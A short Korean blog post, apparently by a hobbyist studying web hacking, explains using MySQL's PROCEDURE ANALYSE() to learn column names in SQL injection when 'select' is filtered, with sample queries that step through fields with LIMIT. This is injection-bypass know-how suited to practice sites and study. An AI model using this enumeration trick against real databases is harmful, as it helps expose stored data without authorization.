최근 웹해킹에 빠져버려서 공부하던 도중 신기한걸 발견했다!
select가 필터링되어 버리는 상황에선 information_schema 나 columns를 사용할 수가 없다. 그래서 이런상황에서 SQLi를 할 수 있는 방법이 바로 SQLI procedure analyse() 이다!
select id from test where no=1 procedure analyse();
이런 식으로 사용해 필드이름을 알아낼 수 있다. 나머지 필드를 알아내고 싶으면 LIMIT을 사용하면 된다!
select id from test where no=1 LIMIT 0,1 procedure analyse();
select id from test where no=1 LIMIT 1,1 procedure analyse();
select id from test where no=1 LIMIT 1,2 procedure analyse();
요런식으로 말이다 : )
[webhacking.kr] write-up (0) | 2020.04.15 |
---|---|
[webhacking.kr] (ALL clear) (0) | 2020.04.07 |
SSTI 팁 (0) | 2020.03.12 |
정리 정리 (0) | 2020.03.08 |
JWT란? (0) | 2020.03.07 |